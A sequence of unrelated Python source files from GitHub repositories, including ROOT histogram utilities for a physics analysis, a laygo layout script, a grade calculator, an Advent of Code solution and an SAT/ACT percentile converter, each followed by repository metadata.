* len( values )\n value_error_tuplelist = zip( values, errors )\n return value_error_tuplelist_to_hist( value_error_tuplelist, bins )\n\ndef value_errors_tuplelist_to_graph( value_errors_tuplelist, bin_edges, is_symmetric_errors=False ):\n value_error_tuplelist = []\n if is_symmetric_errors:\n value_error_tuplelist = [( value, 0 ) for value, error in value_errors_tuplelist]\n else:\n value_error_tuplelist = [( value, 0 ) for value, lower_error, upper_error in value_errors_tuplelist]\n\n hist = value_error_tuplelist_to_hist( value_error_tuplelist, bin_edges )\n rootpy_graph = asrootpy( TGraphAsymmErrors( hist ) )\n\n set_lower_error = rootpy_graph.SetPointEYlow\n set_upper_error = rootpy_graph.SetPointEYhigh\n\n if is_symmetric_errors:\n for point_i, ( value, error ) in enumerate( value_errors_tuplelist ):\n set_lower_error( point_i, error )\n set_upper_error( point_i, error )\n else:\n for point_i, ( value, lower_error, upper_error ) in enumerate( value_errors_tuplelist ):\n set_lower_error( point_i, lower_error )\n set_upper_error( point_i, upper_error )\n\n return rootpy_graph\n\ndef graph_to_value_errors_tuplelist( graph ):\n values = list( graph.y() )\n errors_high = list( graph.yerrh() )\n errors_low = list( graph.yerrl() )\n value_error_tuplelist = zip( values, errors_low, errors_high )\n return value_error_tuplelist\n\n@hu_log.trace()\ndef value_error_tuplelist_to_hist( value_error_tuplelist, bin_edges ):\n assert( len( bin_edges ) == len( value_error_tuplelist ) + 1 )\n rootpy_hist = Hist( bin_edges, type = 'D' )\n set_bin_value = rootpy_hist.SetBinContent\n set_bin_error = rootpy_hist.SetBinError\n for bin_i, ( value, error ) in enumerate( value_error_tuplelist ):\n set_bin_value( bin_i + 1, value )\n set_bin_error( bin_i + 1, error )\n return rootpy_hist\n\ndef value_tuplelist_to_hist( value_tuplelist, bin_edges ):\n assert( len( bin_edges ) == len( value_tuplelist ) + 1 )\n rootpy_hist = Hist( bin_edges, type = 'D' )\n set_bin_value = rootpy_hist.SetBinContent\n for bin_i, value in enumerate( value_tuplelist ):\n set_bin_value( bin_i + 1, value )\n return rootpy_hist\n\ndef matrix_to_hist2d( value_matrix, x_edges, y_edges ):\n '''\n numpy matrix of values and bin edges -> Hist2D\n '''\n from root_numpy import array2hist\n\n rootpy_hist = Hist2D( x_edges, y_edges, type = 'D' )\n array2hist(value_matrix, rootpy_hist)\n\n # set_bin_value = rootpy_hist.SetBinContent\n # for x in range(0, len(x_edges)-1):\n # for y in range(0, len(y_edges)-1):\n # set_bin_value( x+1, y+1, value_matrix.item(y, x) )\n return rootpy_hist\n\ndef hist2d_to_matrix( hist2d ):\n '''\n hist2d to matrix + bin edges\n '''\n from root_numpy import hist2array\n values = hist2array(hist2d)\n xedges = list(hist2d.xedges())\n yedges = list(hist2d.yedges())\n return values, xedges, yedges\n\ndef sum_histograms( histogram_dict, sample_list ):\n # histogram_dict = {sample:{histogram_name:histogram}\n summary = {}\n preparation = {}\n for sample in sample_list:\n sample_hists = histogram_dict[sample]\n for histogram_name, histogram in sample_hists.iteritems():\n if not preparation.has_key( histogram_name ):\n preparation[histogram_name] = []\n preparation[histogram_name].append( histogram )\n for histogram_name, histogram_list in preparation.iteritems():\n summary[histogram_name] = sum( histogram_list )\n return summary\n\ndef scale_histogram_errors( histogram, total_error ):\n bins_number = histogram.GetNbinsX()\n current_total_error = sum( histogram.yerravg() )\n scale_factor = total_error / current_total_error\n\n 
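# NOTE (added): this assumes the input histogram carries non-zero errors;\n    # a zero current_total_error would raise ZeroDivisionError here.\n    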
for bin_i in range( bins_number ):\n        histogram.SetBinError( bin_i + 1, scale_factor * histogram.GetBinError( bin_i + 1 ) )\n\ndef prepare_histograms( histograms, rebin = 1, scale_factor = 1.,\n                       normalisation = {}, exclude_from_scaling = ['data'] ):\n    # note: the mutable default arguments are only read here, never mutated\n    for sample, histogram_dict in histograms.iteritems():\n        # a bare Hist rather than a {histogram_name: histogram} dict\n        if histogram_dict.__class__.__name__ == 'Hist':\n            h = histogram_dict\n            scale = 1.\n            norm = None\n            if not sample in exclude_from_scaling:\n                scale = scale_factor\n            if sample in normalisation.keys():\n                norm = normalisation[sample]\n            scale_and_rebin_histogram( histogram = h, scale_factor = scale,\n                                      normalisation = norm, rebin = rebin )\n            continue\n        # otherwise go a level deeper\n        for _, histogram in histogram_dict.iteritems():\n            scale = 1.\n            norm = None\n            if not sample in exclude_from_scaling:\n                scale = scale_factor\n            if sample in normalisation.keys():\n                norm = normalisation[sample]\n            scale_and_rebin_histogram( histogram = histogram,\n                                      scale_factor = scale,\n                                      normalisation = norm, rebin = rebin )\n\ndef scale_and_rebin_histogram(histogram, scale_factor,\n                             normalisation = None,\n                             rebin = 1):\n    histogram.Rebin( rebin )\n    histogram.Scale( scale_factor )\n    if not normalisation is None and histogram.Integral() != 0:\n        histogram.Scale( normalisation[0] / histogram.Integral() )\n        scale_histogram_errors( histogram, normalisation[1] )\n\ndef rebin_asymmetric( histogram, bins ):\n    bin_array = array( 'd', bins )\n    nbins = len( bin_array ) - 1\n    new_histogram = histogram.Rebin( nbins, histogram.GetName() + 'new', bin_array )\n    return asrootpy( new_histogram )\n
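\ndef _example_rebin_asymmetric():\n    # Added sketch (hypothetical usage, not part of the original API):\n    # merge ten unit-width bins into three bins of unequal width; the new\n    # edges must line up with a subset of the old ones.\n    fine = Hist( list( range( 11 ) ), type = 'D' )\n    for bin_i in range( 1, 11 ):\n        fine.SetBinContent( bin_i, 1. )\n    return rebin_asymmetric( fine, [0, 2, 5, 10] )\n\n@hu_log.trace()\ndef spread_x( histograms, bin_edges ):\n    \"\"\"\n    Usually when plotting multiple histograms with same x-values and\n    similar y-values their markers will overlap. This function spreads\n    the data points across a bin. 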
It creates a set of graphs with the\n same y-values but different x.\n\n @param histograms: list of histograms with same binning\n @param bin_edges: the bin edges of the histograms\n \"\"\"\n # construct bins from the bin edges\n bins = [( bin_lower, bin_upper ) for bin_lower, bin_upper in izip( bin_edges[:-1], bin_edges[1:] )]\n # now get the bin widths\n bin_widths = [abs( bin_i[1] - bin_i[0] ) for bin_i in bins]\n # number of histograms\n number_of_hists = len( histograms )\n # and divide the bins into equidistant bits leaving some space to the bin edges\n x_locations = []\n add_locations = x_locations.append\n for bin_lower, width in izip( bin_edges, bin_widths ):\n x_step = width / ( 1.0 * number_of_hists + 1 ) # +1 due to spacing to bin edge\n add_locations( [bin_lower + n * x_step for n in range( 1, number_of_hists + 1 )] )\n\n # transpose\n x_locations = map( list, zip( *x_locations ) )\n\n graphs = []\n for histogram, x_coordinates in zip( histograms, x_locations ):\n g = Graph( histogram )\n for i, ( x, y ) in enumerate( zip( x_coordinates, histogram.y() ) ):\n g.SetPoint( i, x, y )\n\n graphs.append( g )\n\n return graphs\n\ndef limit_range_y( histogram ):\n \"\"\"\n Calculates the minimum and maximum values of the histogram y values\n Can be useful for setting limits of log plots\n \"\"\"\n tuple_list = hist_to_value_error_tuplelist( histogram )\n min_value = map( min, zip( *tuple_list ) )[0]\n max_value = map( max, zip( *tuple_list ) )[0]\n return min_value, max_value\n\ndef fix_overflow( hist ):\n ''' Moves entries from the overflow bin into the last bin as we treat the last bin as everything > last_bin.lower_edge.\n This is to fix a bug in the unfolding workflow where we neglect this treatment.'''\n\n if 'TH1' in hist.class_name():\n last_bin = hist.nbins()\n overflow_bin = last_bin + 1\n overflow = hist.GetBinContent( overflow_bin )\n overflow_error= hist.GetBinError( overflow_bin )\n\n new_last_bin_content = hist.GetBinContent( last_bin ) + overflow\n new_last_bin_error = sqrt(hist.GetBinError( last_bin ) ** 2 + overflow_error ** 2)\n\n hist.SetBinContent( last_bin, new_last_bin_content )\n hist.SetBinError( last_bin, new_last_bin_error )\n hist.SetBinContent( overflow_bin, 0. )\n elif 'TH2' in hist.class_name():\n last_bin_x = hist.nbins()\n last_bin_y = hist.nbins( axis = 1 )\n overflow_bin_x = last_bin_x + 1\n overflow_bin_y = last_bin_y + 1\n # first all y-overflow\n for x in range( 1, overflow_bin_x +1):\n overflow_y = hist.GetBinContent( x, overflow_bin_y )\n overflow_error_y = hist.GetBinError( x, overflow_bin_y )\n\n last_bin_content_y = hist.GetBinContent( x, last_bin_y )\n last_bin_error_y = hist.GetBinError( x, last_bin_y )\n\n hist.SetBinContent( x, overflow_bin_y, 0. )\n hist.SetBinContent( x, last_bin_y, overflow_y + last_bin_content_y )\n hist.SetBinError( x, last_bin_y, sqrt( overflow_error_y ** 2 + last_bin_error_y ** 2 ) )\n # now all x-overflow\n for y in range( 1, overflow_bin_y +1):\n overflow_x = hist.GetBinContent( overflow_bin_x, y )\n overflow_error_x = hist.GetBinError( overflow_bin_x, y )\n\n last_bin_content_x = hist.GetBinContent( last_bin_x, y )\n last_bin_error_x = hist.GetBinError( last_bin_x, y )\n\n hist.SetBinContent( overflow_bin_x, y, 0. 
)\n hist.SetBinContent( last_bin_x, y, overflow_x + last_bin_content_x )\n hist.SetBinError( last_bin_x, y, sqrt( overflow_error_x ** 2 + last_bin_error_x ** 2 ) )\n # and now the final bin (both x and y overflow)\n overflow_x_y = hist.GetBinContent( overflow_bin_x, overflow_bin_y )\n last_bin_content_x_y = hist.GetBinContent( last_bin_x, last_bin_y )\n hist.SetBinContent( overflow_bin_x, overflow_bin_y, 0. )\n hist.SetBinContent( last_bin_x, last_bin_y, overflow_x_y + last_bin_content_x_y )\n else:\n raise Exception(\"Unknown type of histogram in fix_overflow\")\n\n hist = transfer_values_without_overflow(hist)\n return hist\n\ndef transfer_values_without_overflow( histogram ):\n if histogram == None:\n return histogram\n\n histogram_new = None\n if 'TH1' in histogram.class_name():\n histogram_new = Hist( list( histogram.xedges() ), type = 'D' )\n n_bins = histogram_new.nbins()\n for i in range(1, n_bins + 1):\n histogram_new.SetBinContent(i, histogram.GetBinContent(i))\n histogram_new.SetBinError(i, histogram.GetBinError(i))\n elif 'TH2' in histogram.class_name():\n histogram_new = Hist2D( list( histogram.xedges() ), list( histogram.yedges() ), type = 'D' )\n n_bins_x = histogram_new.nbins()\n n_bins_y = histogram_new.nbins(axis=1)\n for i in range(1, n_bins_x + 1):\n for j in range(1, n_bins_y + 1):\n histogram_new.SetBinContent(i,j, histogram.GetBinContent(i, j))\n histogram_new.SetBinError(i,j, histogram.GetBinError(i, j))\n else:\n raise Exception(\"Unknown type of histogram in transfer_values_without_overflow\")\n\n return histogram_new\n\ndef rebin_2d( hist_2D, bin_edges_x, bin_edges_y ):\n # since there is no easy way to rebin a 2D histogram, lets make it from\n # scratch\n random_string = ''.join( random.choice( string.ascii_uppercase + string.digits ) for _ in range( 6 ) )\n hist = Hist2D( bin_edges_x, bin_edges_y, name = hist_2D.GetName() + '_rebinned_' + random_string )\n n_bins_x = hist_2D.nbins()\n n_bins_y = hist_2D.nbins( axis = 1 )\n\n fill = hist.Fill\n get = hist_2D.GetBinContent\n x_axis_centre = hist_2D.GetXaxis().GetBinCenter\n y_axis_centre = hist_2D.GetYaxis().GetBinCenter\n for i in range( 0, n_bins_x + 1 ):\n for j in range( 0, n_bins_y + 1 ):\n fill( x_axis_centre( i ), y_axis_centre( j ), get( i, j ) )\n\n return hist\n\ndef conditional_rebin( histogram, bin_edges ):\n histogram_ = deepcopy(histogram)\n current_nbins = histogram.nbins()\n new_nbins = len( bin_edges ) - 1\n # check if already have the correct number of bins\n if not current_nbins == new_nbins:\n # check if re-binning is possible (simple way)\n if current_nbins > new_nbins:\n histogram_ = histogram_.rebinned( bin_edges, axis = 0 )\n if 'TH2' in histogram_.class_name():\n histogram_ = histogram_.rebinned( bin_edges, axis = 1 )\n return histogram_\n\ndef clean_control_region(histograms = {},\n data_label = 'data',\n subtract = [],\n fix_to_zero = True):\n '''This function takes a dictionary of histograms (sample_name:histogram)\n and will subtract all samples given in the parameter \"subtract\" from the\n data distribution.\n '''\n data_hist = deepcopy(histograms[data_label])\n # first subtract all necessary samples\n for sample, histogram in histograms.iteritems():\n if sample in subtract:\n data_hist -= histogram\n # next make sure there are no negative events\n if fix_to_zero:\n for bin_i, y in enumerate(data_hist.y(overflow=True)):\n if y < 0:\n data_hist.SetBinContent(bin_i, 0)\n # add the difference to 0 to the existing error\n data_hist.SetBinError(bin_i, data_hist.GetBinError(bin_i) + 
abs(y))\n return data_hist\n\ndef adjust_overflow_to_limit(histogram, x_min, x_max):\n ''' Adjust the first and last bin of the histogram such that it becomes\n the new under- and overflow bin'''\n # get the bin before x_min\n histogram_ = deepcopy(histogram)\n underflow_bin = histogram_.FindBin(x_min)\n overflow_bin = histogram_.FindBin(x_max)\n n_bins = histogram_.nbins()\n underflow, underflow_error = 0, 0\n overflow, overflow_error = 0, 0\n if not underflow_bin < 1:\n underflow, underflow_error = histogram_.integral(0, underflow_bin, error=True)\n for i in range(underflow_bin + 1):\n histogram_.SetBinContent(i, 0)\n histogram_.SetBinError(i, 0)\n\n if not overflow_bin > n_bins:\n overflow, overflow_error = histogram_.integral(overflow_bin, n_bins + 1, error=True)\n for i in range(overflow_bin, n_bins + 2):\n histogram_.SetBinContent(i, 0)\n histogram_.SetBinError(i, 0)\n\n histogram_.SetBinContent(underflow_bin, underflow)\n histogram_.SetBinError(underflow_bin, underflow_error)\n histogram_.SetBinContent(overflow_bin, overflow)\n histogram_.SetBinError(overflow_bin, overflow_error)\n\n return histogram_\n\ndef get_fitted_normalisation( variable, channel, path_to_JSON, category, met_type ):\n '''\n This function now gets the error on the fit correctly,\n so that it can be applied if the --normalise_to_fit option is used\n '''\n from dps.config import variable_binning as cfg_binning\n variable_bins_ROOT = cfg_binning.variable_bins_ROOT \n fit_results = read_data_from_JSON( path_to_JSON + variable + '/fit_results/' + category + '/fit_results_' + channel + '_' + met_type + '.txt' )\n\n N_fit_ttjet = [0, 0]\n N_fit_singletop = [0, 0]\n N_fit_vjets = [0, 0]\n N_fit_qcd = [0, 0]\n\n bins = variable_bins_ROOT[variable]\n for bin_i, _ in enumerate( bins ):\n # central values\n N_fit_ttjet[0] += fit_results['TTJet'][bin_i][0]\n N_fit_singletop[0] += fit_results['SingleTop'][bin_i][0]\n N_fit_vjets[0] += fit_results['V+Jets'][bin_i][0]\n N_fit_qcd[0] += fit_results['QCD'][bin_i][0]\n\n # errors\n N_fit_ttjet[1] += fit_results['TTJet'][bin_i][1]\n N_fit_singletop[1] += fit_results['SingleTop'][bin_i][1]\n N_fit_vjets[1] += fit_results['V+Jets'][bin_i][1]\n N_fit_qcd[1] += fit_results['QCD'][bin_i][1]\n\n fitted_normalisation = {\n 'TTJet': N_fit_ttjet,\n 'SingleTop': N_fit_singletop,\n 'V+Jets': N_fit_vjets,\n 'QCD': N_fit_qcd\n }\n return fitted_normalisation\n\ndef get_data_derived_qcd( control_hists, qcd_exclusive_hist ):\n '''\n Retrieves the data-driven QCD template and normalises it to MC prediction.\n It uses the inclusive template (across all variable bins) and removes other processes\n before normalising the QCD template.\n '''\n\n dataDerived_qcd = clean_control_region( control_hists, subtract = ['TTJet', 'V+Jets', 'SingleTop'] )\n normalisation_QCDdata = dataDerived_qcd.integral( overflow = True )\n normalisation_exclusive = qcd_exclusive_hist.integral( overflow = True )\n\n scale = 1.\n if not normalisation_QCDdata == 0:\n if not normalisation_exclusive == 0:\n scale = 1 / normalisation_QCDdata * normalisation_exclusive\n else:\n scale = 1 / normalisation_QCDdata\n dataDerived_qcd.Scale( scale )\n return dataDerived_qcd\n\ndef get_normalisation_error( normalisation ):\n total_normalisation = 0.\n total_error = 0.\n for _, number in normalisation.iteritems():\n total_normalisation += number[0]\n total_error += number[1]\n return total_error / total_normalisation\n\ndef get_fit_results_histogram( data_path = 'data/M3_angle_bl',\n centre_of_mass = 8,\n channel = 'electron',\n variable = 
'MET',\n met_type = 'patType1CorrectedPFMet',\n bin_edges = [] ):\n fit_result_input = data_path + '/%(CoM)dTeV/%(variable)s/fit_results/central/fit_results_%(channel)s_%(met_type)s.txt'\n fit_results = read_data_from_JSON( fit_result_input % {'CoM': centre_of_mass, 'channel': channel, 'variable': variable, 'met_type':met_type} )\n fit_data = fit_results['TTJet']\n h_data = value_error_tuplelist_to_hist( fit_data, bin_edges )\n return h_data\n\ndef get_histogram_ratios(nominator, denominators, normalise_ratio_to_errors = False):\n ratios = []\n for denom in denominators:\n ratio = nominator.Clone()\n if normalise_ratio_to_errors:\n # TODO\n # this is a preliminary feature, use with care\n for bin_i in range( 1, nominator.nbins() ):\n x_i = nominator[bin_i].value\n x_i_error = nominator[bin_i].error\n y_i = denom[bin_i].value\n y_i_error = denom[bin_i].error\n numerator = x_i - y_i\n denominator = pow( pow( x_i_error, 2 ) + pow( y_i_error, 2 ), 0.5 )\n if denominator == 0:\n ratio.SetBinContent(bin_i, 0.)\n ratio.SetBinError(bin_i, 0.)\n else:\n ratio.SetBinContent(bin_i, numerator/denominator)\n ratio.SetBinError(bin_i, denominator)\n else:\n ratio.Divide( denom )\n if len(denominators) > 1:\n ratio.linecolor = denom.linecolor\n ratio.fillcolor = denom.fillcolor\n ratios.append(ratio)\n return ratios\n\ndef copy_style(copy_from, copy_to):\n # colours\n copy_to.linecolor = copy_from.linecolor\n copy_to.markercolor = copy_from.markercolor\n copy_to.fillcolor = copy_from.fillcolor\n # style\n copy_to.markerstyle = copy_from.markerstyle\n copy_to.linestyle = copy_from.linestyle\n copy_to.fillstyle = copy_from.fillstyle\n # size\n copy_to.markersize = copy_from.markersize\n copy_to.linesize = copy_from.markersize\n # legend\n copy_to.legendstyle = copy_from.legendstyle\n\n\ndef make_line_hist(bin_edges, y_value):\n l = Hist(bin_edges, type = 'D')\n for i in range(1, len(bin_edges)):\n l.SetBinContent(i, y_value)\n return l\n\ndef absolute(hist):\n h = deepcopy(hist)\n for bin_i in range(1, h.nbins() + 1):\n value = h.GetBinContent(bin_i)\n error = h.GetBinError(bin_i)\n h.SetBinContent(bin_i, abs(value))\n h.SetBinError(bin_i, abs(error))\n return h\n\nif __name__ == '__main__':\n value_error_tuplelist = [( 0.006480446927374301, 0.0004647547547401945 ),\n ( 0.012830288388947605, 0.0010071677178938234 ),\n ( 0.011242639287332025, 0.000341258792551077 ),\n ( 0.005677185565453722, 0.00019082371879446718 ),\n ( 0.0008666767325985203, 5.0315979327182054e-05 )]\n hist = value_error_tuplelist_to_hist( value_error_tuplelist, bin_edges = [0, 25, 45, 70, 100, 300] )\n import rootpy.plotting.root2matplotlib as rplt\n import matplotlib.pyplot as plt\n plt.figure( figsize = ( 16, 10 ), dpi = 100 )\n plt.figure( 1 )\n rplt.errorbar( hist, label = 'test' )\n plt.xlabel( 'x' )\n plt.ylabel( 'y' )\n plt.title( 'Testing' )\n plt.legend( numpoints = 1 )\n plt.savefig( 'Array2Hist.png' )\n plt.close()\n\n value_errors_tuplelist = [( 0.006480446927374301, 0.0004647547547401945, 0.0004647547547401945 * 2 ),\n ( 0.012830288388947605, 0.0010071677178938234, 0.0010071677178938234 * 2 ),\n ( 0.011242639287332025, 0.000341258792551077 * 2, 0.000341258792551077 ),\n ( 0.005677185565453722, 0.00019082371879446718 * 2, 0.00019082371879446718 ),\n ( 0.0008666767325985203, 5.0315979327182054e-05, 5.0315979327182054e-05 )]\n hist = value_errors_tuplelist_to_graph( value_errors_tuplelist, bin_edges = [0, 25, 45, 70, 100, 300] )\n tuplelist = graph_to_value_errors_tuplelist( hist )\n assert tuplelist == 
value_errors_tuplelist\n\n plt.figure( figsize = ( 16, 10 ), dpi = 100 )\n plt.figure( 1 )\n rplt.errorbar( hist, label = 'test2' )\n plt.xlabel( 'x' )\n plt.ylabel( 'y' )\n plt.title( 'Testing' )\n plt.legend( numpoints = 1 )\n plt.savefig( 'Array2Graph.png' )\n","repo_name":"BristolTopGroup/DailyPythonScripts","sub_path":"dps/utils/hist_utilities.py","file_name":"hist_utilities.py","file_ext":"py","file_size_in_byte":23213,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"20309576076","text":"import laygo\nimport numpy as np\nimport yaml\n#import logging;logging.basicConfig(level=logging.DEBUG)\n\nimport os.path\nlaygen = laygo.GridLayoutGenerator(config_file='laygo_config.yaml')\nif laygen.tech=='laygo10n' or laygen.tech=='laygo_faketech': #fake technology\n laygen.use_phantom = True\n\nworkinglib = 'laygo_working'\nutemplib = laygen.tech+'_microtemplates_dense'\nltemplib = laygen.tech+'_templates_logic'\n\nlaygen.add_library(workinglib); laygen.sel_library(workinglib)\n\nlaygen.load_template(filename=laygen.tech+'_microtemplates_dense_templates.yaml', libname=utemplib)\nlaygen.load_template(filename=laygen.tech+'_templates_logic_templates.yaml', libname=ltemplib)\nlaygen.load_grid(filename=laygen.tech+'_microtemplates_dense_grids.yaml', libname=utemplib)\nlaygen.templates.sel_library(ltemplib)\nlaygen.grids.sel_library(utemplib)\n#laygen.templates.display()\n#laygen.grids.display()\n\npg = 'placement_basic' #placement grid\nrg_m1m2 = 'route_M1_M2_basic'\nrg_m2m3 = 'route_M2_M3_basic'\nrg_m3m4 = 'route_M3_M4_basic'\nrg_m1m2_pin = 'route_M1_M2_basic'\nrg_m2m3_pin = 'route_M2_M3_basic'\n\nmycell = '_generate_example_4'\npg = 'placement_basic' #placement grid\nlaygen.add_cell(mycell)\nlaygen.sel_cell(mycell) #select the cell to work on\n\n#placement\nimux0=laygen.place(None, 'tinv_4x', pg, xy=np.array([0,0]))\nispace0=laygen.relplace(name = None, templatename = 'space_1x', gridname = pg, refinstname = imux0.name, shape=np.array([3,1]))\nimux1=laygen.relplace(name = None, templatename = 'tinv_4x', gridname = pg, refinstname = ispace0.name)\nispace1=laygen.relplace(name = None, templatename = 'space_1x', gridname = pg, refinstname = imux1.name, shape=np.array([2,1]))\niinv0=laygen.relplace(name = None, templatename = 'inv_4x', gridname = pg, refinstname = ispace1.name)\n\n#route\nxy_en=laygen.get_template_pin_xy(imux0.cellname, 'EN', rg_m3m4)[0]\nxy_enb=laygen.get_template_pin_xy(imux0.cellname, 'ENB', rg_m3m4)[0]\nxy_o=laygen.get_template_pin_xy(imux0.cellname, 'O', rg_m3m4)[0]\nxy_inv_i=laygen.get_template_pin_xy(iinv0.cellname, 'I', rg_m3m4)[0]\nlaygen.route(None, laygen.layers['metal'][4], xy0=np.array([xy_en[0],xy_enb[1]]), xy1=np.array([xy_enb[0],xy_enb[1]]), gridname0=rg_m3m4, refinstname0=imux0.name, refinstname1=imux1.name)\nlaygen.route(None, laygen.layers['metal'][4], xy0=np.array([xy_enb[0],xy_enb[1]+1]), xy1=np.array([xy_en[0],xy_enb[1]+1]), gridname0=rg_m3m4, refinstname0=imux0.name, refinstname1=imux1.name)\nlaygen.route(None, laygen.layers['metal'][4], xy0=np.array([xy_o[0],xy_enb[1]+2]), xy1=np.array([xy_inv_i[0],xy_enb[1]+2]), gridname0=rg_m3m4, refinstname0=imux0.name, refinstname1=iinv0.name)\nlaygen.via(None, np.array([xy_en[0],xy_enb[1]]), refinstname=imux0.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_enb[0],xy_enb[1]]), refinstname=imux1.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_enb[0],xy_enb[1]+1]), refinstname=imux0.name, gridname=rg_m3m4)\nlaygen.via(None, 
np.array([xy_en[0],xy_enb[1]+1]), refinstname=imux1.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_o[0],xy_enb[1]+2]), refinstname=imux0.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_o[0],xy_enb[1]+2]), refinstname=imux1.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_inv_i[0],xy_enb[1]+2]), refinstname=iinv0.name, gridname=rg_m3m4)\n\n#laygen.display()\n#db.display()\n\n#bag export, if bag does not exist, gds export\nimport imp\ntry:\n imp.find_module('bag')\n import bag\n prj = bag.BagProject()\n laygen.sel_cell(mycell)\n laygen.export_BAG(prj, array_delimiter=['[', ']'])\nexcept ImportError:\n laygen.sel_cell(mycell) # cell selection\n laygen.export_GDS('output.gds', layermapfile=laygen.tech+\".layermap\") # change layermapfile\n","repo_name":"rowhit/laygo","sub_path":"labs/lab2_d_gridlayoutgenerator_layoutexercise_2.py","file_name":"lab2_d_gridlayoutgenerator_layoutexercise_2.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5070524326","text":"\"\"\"\r\n__author__ = Yash Patel\r\n__name__ = extract.py\r\n__description__ = Given classifications provided by the clustering algorithm (given in \r\na binary pickle format), determines the corresponding accuracy \r\n\"\"\"\r\n\r\nimport pickle\r\n\r\ndef compute_accuracy(truth_fn, guess_fn):\r\n truth = pickle.load(open(truth_fn, \"rb\"))\r\n guess = pickle.load(open(guess_fn, \"rb\"))\r\n \r\n truth_wallets = truth.values()\r\n guess_wallets = guess.values()\r\n\r\n guess_performance = {}\r\n for guess_wallet in guess_wallets:\r\n total_overlap = 0\r\n for true_owner in truth:\r\n overlap = len(guess_wallet.intersection(truth[true_owner]))\r\n total_overlap += overlap\r\n if overlap > 0:\r\n if guess_wallet not in guess_performance:\r\n guess_performance[guess_wallet] = {}\r\n guess_performance[guess_wallet][true_owner] = overlap\r\n if total_overlap > 0:\r\n for owner in guess_performance[guess_wallet]:\r\n guess_performance[guess_wallet] /= total_overlap\r\n return guess_performance\r\n\r\ndef write_performance(truth_fn, guess_fn):\r\n guess_performance = compute_accuracy(truth_fn, guess_fn)\r\n with open(\"truth/accuracy.txt\", \"w\") as f:\r\n for person in guess_performance:\r\n f.write(\"{} : {}\\n\".format(person, guess_performance[person]))\r\n\r\nif __name__ == \"__main__\":\r\n write_performance(\r\n \"output/SpectralClustering_guess.pickle\", \r\n \"truth/extracted.pickle\")","repo_name":"yashpatel5400/anonychain","sub_path":"truth/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33693372402","text":"\n\n## PYTHON\n\n# Define a function to get inputs\ndef getExamInput():\n try:\n ahmet = int(input(\"Midterm 1: \"))\n mehmet = int(input(\"Midterm 2: \"))\n necdet = int(input(\"Final : \"))\n\n return ahmet,mehmet,necdet\n\n except: # If it is not an integer warn the user\n print(\"Please type an integer !!\")\n return getExamInput()\n\n# Print Welcome Title\nprint(\"\\n\\n--- A-MEAN Grade Calculator ---\\n\\n\")\n\n# Get Student Name from User\nstudentName = input(\"Name: \")\n\n# Try - Get Exam Grades\nmid1,mid2,final = getExamInput()\n\n# Calculate the average\naverage = mid1 * 0.3 + mid2 * 0.3 + final * 0.4\n\n## Decide the letter grade\nletterGrade = \"\"\n\nif(average > 90):\n letterGrade = \"A\"\nelif(average > 80):\n letterGrade = \"B\"\nelif(average > 70):\n 
letterGrade = \"C\"\nelif(average > 60):\n letterGrade = \"D\"\nelse:\n letterGrade = \"F\"\n\noutput = f\"\"\"\n------------------------\nStudent : {studentName}\nMidterm 1: {mid1}\nMidterm 2: {mid2}\nFinal : {final}\n------------------------\nAverage : {average}\nLetter Grade : {letterGrade}\n\"\"\"\n\nprint(output)\n\n\n","repo_name":"eminkartci/PythonCourse","sub_path":"Archive/Lecture1/gradeCalculator.py","file_name":"gradeCalculator.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10219743847","text":"import operator\nimport sys \n# input = [0, 2, 7, 0]\ninput = [10, 3, 15, 10, 5, 15, 5, 15, 9, 2, 5, 8, 5, 2, 3, 6]\n\ndef redist(l):\n index, max_value = max(enumerate(l), key=operator.itemgetter(1))\n \n blocks_to_redist = max(int(max_value / (len(l) - 1)), 1)\n remaining_blocks = max_value\n blocks = list(l)\n blocks[index] = 0\n index = (index + 1) % len(blocks)\n \n while remaining_blocks > blocks_to_redist:\n blocks[index] += blocks_to_redist\n remaining_blocks -= blocks_to_redist\n index = (index + 1) % len(blocks)\n\n # move the last chunk of blocks\n blocks[index] += remaining_blocks\n return blocks\n \ndef count_redist(l):\n results = []\n count = 0\n result = l\n while True:\n count += 1\n result = redist(result)\n if result in results:\n return result, count\n \n results.append(result)\n\nredistributed, count = count_redist(input) \nprint(count)\n\nprint(count_redist(redistributed)[1] - 1)\n","repo_name":"gordonshieh/Advent2017","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73489912729","text":"from . 
import percentiles\n\nimport pandas as pd\n\n# for now using the percentile ranks from the original SAT 1600 test\n# pre-2007\nSAT_conversions = {\n \"composite\": percentiles.SAT_1600_COMPOSITE,\n \"math\": percentiles.SAT_1600_MATH,\n \"reading_writing\": percentiles.SAT_1600_VERBAL\n}\n\nACT_conversions = {\n \"composite\": percentiles.ACT_COMPOSITE,\n \"math\": percentiles.ACT_MATH,\n \"english\": percentiles.ACT_ENGLISH,\n \"reading\": percentiles.ACT_READING,\n \"science\": percentiles.ACT_SCIENCE,\n}\n\n\ndef dataframe_to_ranks(dataframe):\n \"\"\"Given a DataFrame of raw ACT/SAT scores by composite and subject,\n convert scores into percentile ranks.\"\"\"\n columns = {}\n for colname in dataframe.columns:\n if 'equivalent' in colname:\n continue\n col = dataframe[colname]\n if col.dtype == 'int64':\n col = score_to_rank(col, colname)\n columns[colname] = col\n return pd.concat(columns, axis=1).reindex(dataframe.index)\n\n\ndef score_to_rank(scores, subject):\n # try to infer the type of test by looking at range of scores.\n # ACT = 1-36 and SAT = 200-800\n test_type = \"ACT\" if scores.max() <= 36 else \"SAT\"\n conversions = ACT_conversions if test_type == \"ACT\" else SAT_conversions\n return scores.map(conversions[subject])\n\n\ndef ranks_to_cdf(ranks):\n xs = pd.Series(list(range(1,100)))\n cdf = 